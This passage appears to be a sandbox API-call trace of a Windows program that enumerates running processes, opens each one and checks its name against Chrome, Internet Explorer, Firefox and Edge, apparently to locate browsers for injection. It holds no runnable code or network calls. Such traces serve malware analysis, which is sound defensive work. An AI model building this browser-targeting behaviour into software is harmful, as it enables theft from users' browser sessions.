	[0199.099] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0199.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x181c
	[0199.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.100] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0199.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.101] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.101] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0199.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.101] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.102] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1820
	[0199.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.102] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.103] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.103] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.103] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.104] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0199.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1824
	[0199.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.104] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0199.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.105] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.105] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0199.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.105] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.106] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0199.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1828
	[0199.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.106] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0199.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.107] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.107] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0199.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.107] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.108] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0199.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x182c
	[0199.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.108] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0199.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.109] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.109] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0199.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.109] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.109] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0199.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1830
	[0199.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.110] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.111] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.111] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.111] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.111] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1834
	[0199.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.112] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.112] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.113] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.113] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.113] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1838
	[0199.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.114] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.114] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.115] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.115] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.115] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x183c
	[0199.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.116] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.116] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.116] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.117] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.117] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1840
	[0199.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.118] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.118] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.118] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.119] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.119] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1844
	[0199.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.120] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.120] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.120] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.121] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.121] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1848
	[0199.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.122] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.122] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.122] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.123] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.123] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x184c
	[0199.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.124] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.124] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.124] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.125] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.125] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0199.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1850
	[0199.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.126] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0199.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.126] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.126] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0199.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.127] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.127] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1854
	[0199.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.128] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.128] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.128] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.128] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.129] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0199.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1858
	[0199.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.129] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.130] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.130] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.130] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.131] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x185c
	[0199.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.131] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.132] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1860
	[0199.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.133] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.134] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.134] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.134] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.135] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0199.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1864
	[0199.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0199.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0199.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.137] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0199.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1868
	[0199.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.138] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0199.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.139] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.139] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0199.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.139] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.139] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0199.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x186c
	[0199.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.140] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.140] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.141] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.141] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.141] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0199.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1870
	[0199.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.142] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0199.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.142] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.143] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0199.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.143] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.143] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0199.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0199.144] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0199.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1874
	[0199.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.145] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0199.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.145] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.146] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0199.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.146] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.147] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0199.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1878
	[0199.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.147] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0199.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.148] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.148] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0199.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.148] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.148] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0199.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x187c
	[0199.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.149] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0199.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
